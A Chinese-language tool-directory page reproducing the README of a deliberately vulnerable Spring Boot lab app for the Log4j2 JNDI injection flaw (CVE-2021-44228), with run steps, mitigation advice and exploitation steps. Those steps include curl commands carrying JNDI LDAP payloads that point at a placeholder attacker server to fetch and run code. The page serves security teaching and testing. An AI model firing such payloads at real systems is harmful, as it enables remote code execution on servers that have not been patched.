Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j2-CVE-2021-44228 — 存在漏洞的 Spring Boot Web 应用程序,演示 Log4j2 JNDI 注入(CVE-2021-44228),包含利用步骤和缓解指南,用于安全测试和教育。 | Kitploit
工具/GitHubGitHub/pravin-pp/log4j2-cve-2021-44228
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubpravin-pp/log4j2-cve-2021-44228

log4j2-CVE-2021-44228

存在漏洞的 Spring Boot Web 应用程序,演示 Log4j2 JNDI 注入(CVE-2021-44228),包含利用步骤和缓解指南,用于安全测试和教育。

查看仓库
114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

示例 Log4j2 易受攻击的应用程序 (CVE-2021-44228)

受影响版本:从 2.0-beta9 到 2.14.1 的所有版本

此应用程序基于易受 CVE-2021-44228 攻击的 Spring Boot Web 应用程序。

它使用 Log4j 2.14.1(通过 spring-boot-starter-log4j2 2.6.1)。

运行应用程序

运行它:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

利用步骤

  • 然后,使用以下命令触发漏洞利用:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/efdgt62jjd0002leee=}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addemployee' \
--header 'Content-Type: application/json' \
--data '{
	"name": "${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}"
}'
  • 注意输出,可以看到它正在连接到恶意的 LDAP 服务器:
root@kitploit:~
021-12-12 12:17:00,579 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.CommunicationException: your-private-ip:1389 [Root exception is java.net.UnknownHostException: your-private-ip]


Caused by: java.net.UnknownHostException: your-private-ip
  • 如果你提供真实的 ldap 服务器详细信息,它将下载该对象并在你的 Java 程序中执行

如果你的应用程序打印未经校验数据的日志消息,此漏洞将影响所有服务器,包括面向客户端的系统和后端核心系统..

  • 例如,包含漏洞利用代码的 User-Agent 字符串可能会被传递给用 Java 编写的、执行索引或数据科学的后端系统,并且该漏洞利用代码可能会被记录到日志中。这就是为什么所有使用 Log4j 2 版本的基于 Java 的软件都必须立即修补或应用缓解措施。即使面向互联网的软件不是用 Java 编写的,字符串也可能会传递给其他用 Java 编写的系统,从而使漏洞利用得以发生。

缓解措施:

参考:https://logging.apache.org/log4j/2.x/security.html

  • 应用程序的快速热修复 -> 在 >=2.10 的版本中,可以通过将系统属性 log4j2.formatMsgNoLookups 或环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS 设置为 true 来缓解此行为。对于 2.0-beta9 到 2.10.0 的版本,缓解措施是从 classpath 中移除 JndiLookup 类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class。

  • 在应用程序中将 log4j 升级到 2.15.0 并部署

下载工具